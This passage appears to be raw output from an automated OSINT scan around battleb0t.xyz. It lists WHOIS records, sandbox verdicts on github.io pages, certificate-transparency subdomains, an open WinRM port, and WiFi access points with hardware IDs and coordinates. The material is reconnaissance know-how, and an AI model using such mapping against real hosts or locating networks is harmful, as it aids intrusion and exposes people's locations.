Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:55:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 3, u'search_terms': [{u'id': u'host', u'value': u'104.21.6.166'}], u'result': [{u'environment_id': 100, u'job_id': u'640a87ec5deba64bf90bd5e3', u'analysis_start_time': u'2023-03-10 01:29:16', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'15de03b9f1a0096ab0b30f52b553b469c70dbccd4417995d4b7fdc4cee25557a', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 160, u'job_id': u'63fc26ad86a713231f0ec51d', u'analysis_start_time': u'2023-02-27 03:42:37', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 1, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'69980d4c29a4a5407bb25c94430a4932ebe493bfead4f5a2fabc21dbc30aebda', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 160, u'job_id': u'63a00a6524ef340fae30348a', u'analysis_start_time': u'2022-12-19 06:53:25', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 23, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'15de03b9f1a0096ab0b30f52b553b469c70dbccd4417995d4b7fdc4cee25557a', u'type': None, u'type_short': u'url', u'size': 67}]} | 104.21.6.166 |
| 2023-05-12 02:44:12 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.cloudwaysapps.com, cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | overkant (Net ID: 00:01:36:07:DC:22) | 52.3759, 4.8975 |
| 2023-05-12 02:51:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://webcamoid.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_c64_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3172"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_c64_IE_EarlyTabStart_0xa8c_Mutex"\n "IsoScope_c64_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_c64_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c64_ConnHashTable<3172>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c64_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "webcamoid.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"webcamoid_1_.png" has type "PNG image data 64 x 64 8-bit/color RGBA non-interlaced" and extension "png"\n "favicon_1_.png" has type "PNG image data 16 x 15 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{b04a5edd-ee0f-11ed-acb1-080027098343}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df196c020f5a094e9f.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df196c020f5a094e9f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{b04a5edd-ee0f-11ed-acb1-080027098343}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfb061f576187ef20c.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{b04a5edf-ee0f-11ed-acb1-080027098343}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ClearSans-Light_1_.ttf" has type "TrueType Font data 20 tables 1st "GPOS" 24 names Macintosh Font software Copyright \\251 2012 Intel Corporation. Licensed under the Apache License Version"- [targetUID: N/A]\n "DesktopCapture_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "VirtualCamera_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "Main_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "Recording_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "Effects_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003172]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFB061F576187EF20C.TMP" has type "data"- Location: [%TEMP%\\~DFB061F576187EF20C.TMP]- [targetUID: 00000000-00003172]\n "~DF196C020F5A094E9F.TMP" has type "data"- Location: [%TEMP%\\~DF196C020F5A094E9F.TMP]- [targetUID: 00000000-00003172]\n "~DF3999E32F2D2A875E.TMP" has type "data"- Location: [%TEMP%\\~DF3999E32F2D2A875E.TMP]- [targetUID: 00000000-00003172]\n "~DFF70C03EBA959F549.TMP" has type "data"- Location: [%TEMP%\\~DFF70C03EBA959F549.TMP]- [targetUID: 00000000-00003172]\n "desktop_1_.css" has type "ASCII text"- [targetUID: N/A]\n "EBSTL18C.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\EBSTL18C.htm]- [targetUID: 00000000-00002944]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003172]\n "RecoveryStore._B04A5EDD-EE0F-11ED-ACB1-080027098343_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "webcamoid_1_.png" has type "PNG image data 64 x 64 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "_B04A5EDF-EE0F-11ED-ACB1-080027098343_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B797E09C-EE0F-11ED-ACB1-080027098343_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.js" has type "C source ASCII text"- [targetUID: N/A]\n "mobile_1_.css" has type "ASCII text"- [targetUID: N/A]\n "reset_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.png" has type "PNG image data 16 x 15 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "PTUKRQUT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PTUKRQUT.txt]- [targetUID: 00000000-00003172]\n "51SURLHL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\51SURLHL.txt]- [targetUID: 00000000-00003172]\n "VKBTY5T4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VKBTY5T4.txt]- [targetUID: 00000000-00003172]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "FG7SB3TD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FG7SB3TD.txt]- [targetUID: 00000000-00003172]\n "main_1_.css" has type "ASCII text"- [targetUID: N/A]\n "3F4OTZE6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3F4OTZE6.txt]- [targetUID: 00000000-00003172]\n "JBZG5CV8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JBZG5CV8.txt]- [targetUID: 00000000-00003172]\n "IW96THVI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IW96THVI.txt]- [targetUID: 00000000-00003172]\n "urlref_httpswebcamoid.github.io" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"query.prod.cms.msn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://webcamoid.github.io/"\n Pattern match: "https://webcamoid.github.io"\n Pattern match: "lY.UMDe/;+d*4IsQUA8[9D"\n Pattern match: "http://meyerweb.com/eric/ | 185.199.108.153 |
| 2023-05-12 02:50:45 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://khushishikhu.github.io/Netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2868"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_IE_EarlyTabStart_0x87c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_ConnHashTable<2868>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b34_IESQMMUTEX_0_519"\n "IsoScope_b34_IESQMMUTEX_0_331"\n "IsoScope_b34_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.64.133.15:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"khushishikhu.github.io"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com" (Indicator: "dir "; File: "Netflix-clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-1_1_.png" has type "PNG image data 879 x 622 8-bit/color RGBA non-interlaced" and extension "png"\n "TV-1_1_.png" has type "PNG image data 552 x 368 8-bit/color RGBA non-interlaced" and extension "png"\n "laptop1_1_.png" has type "PNG image data 543 x 319 8-bit/color RGBA non-interlaced" and extension "png"\n "tablet1_1_.png" has type "PNG image data 407 x 256 8-bit/color RGBA non-interlaced" and extension "png"\n "netflix-logo_1_.png" has type "PNG image data 624 x 390 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 879 x 622 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "TV-1_1_.png" has type "PNG image data 552 x 368 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "laptop1_1_.png" has type "PNG image data 543 x 319 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tablet1_1_.png" has type "PNG image data 407 x 256 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002868]\n "~DFEB8DE64FDEFEAC09.TMP" has type "data"- Location: [%TEMP%\\~DFEB8DE64FDEFEAC09.TMP]- [targetUID: 00000000-00002868]\n "~DF9B5BE8AAD9348E43.TMP" has type "data"- Location: [%TEMP%\\~DF9B5BE8AAD9348E43.TMP]- [targetUID: 00000000-00002868]\n "~DFA2CF22B23815D257.TMP" has type "data"- Location: [%TEMP%\\~DFA2CF22B23815D257.TMP]- [targetUID: 00000000-00002868]\n "netflix-logo_1_.png" has type "PNG image data 624 x 390 8-bit colormap non-interlaced"- [targetUID: N/A]\n "urlref_httpskhushishikhu.github.ioNetflix-clone" has type "HTML document ASCII text"- [targetUID: N/A]\n "RecoveryStore._B445AEB7-EF99-11ED-83C4-080027461EB8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "_BBCECB40-EF99-11ED-83C4-080027461EB8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B445AEB9-EF99-11ED-83C4-080027461EB8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "JS_1_.js" has type "ASCII text"- [targetUID: N/A]\n "ZIV20U3Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZIV20U3Z.txt]- [targetUID: 00000000-00002868]\n "2M1391EE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2M1391EE.txt]- [targetUID: 00000000-00002868]\n "1DIL5KRI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1DIL5KRI.txt]- [targetUID: 00000000-00002868]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "0LGY9LCX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0LGY9LCX.txt]- [targetUID: 00000000-00002868]\n "ORG2CQ19.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ORG2CQ19.txt]- [targetUID: 00000000-00002868]\n "NL66CHKW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NL66CHKW.txt]- [targetUID: 00000000-00002868]\n "UB265V1X.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UB265V1X.txt]- [targetUID: 00000000-00002868]\n "Netflix-clone_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://khushishikhu.github.io/Netflix-clone/"\n Pattern match: "https://khushishikhu.github.io"\n Pattern match: "https://khushishikhu.github.io/Netflix-clone"\n Pattern match: "Bj.UUVP/0E{@mX+"\n Pattern match: "Wc.TJ/-tB@W;wsq}jP1"\n Pattern match: "https://fontawesome.comFont"\n Pattern match: "https://use.fontawesome.com/releases/v5.8.2/css/all.css"\n Pattern match: "SUIDmicrosoft.com/9216415687628831032347305882992031032230MUID3CFF7A16C8AC651E350B6918C9286478microsoft.com/1025428936550431110701305882992031032230_EDGE_Vmicrosoft.com/9216428936550431110701305898617031032230SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216415687628831032347305882992031032230MUID3CFF7A16C8AC651E350B6918C9286478microsoft.com/1025428936550431110701305882992031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/9216415687628831032347305882992031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mi"\n Pattern match: "9216428936550431110701306257992031032230MUID34F5E2D5D7CC61EA0749F1DBD68060C6msn.com/1025428936550431110701306257992031032230"\n Pattern match: "MUIDB3CFF7A16C8AC651E350B6918C9286478 | 185.199.108.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LF-X1U.00014A10EF0C (Net ID: 00:01:4A:10:EF:0C) | 37.780462,-122.390564 |
| 2023-05-12 02:54:23 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 14618 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | WordPress (Category: blog) https://profiles.wordpress.org/login/ | login |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 219.30.196.104.bc.googleusercontent.com | 104.196.30.219 |
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.53:5985 | 45.131.109.53 |
| 2023-05-12 02:44:28 | Affiliate - Internet Name | No | DNS Resolver | 22 | 0 | 2 | 0 | None | battleb0t.github.io | www.battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UFUKDEN (Net ID: 00:02:CF:9F:96:D2) | 40.2024, 29.0398 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | teamcity.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': 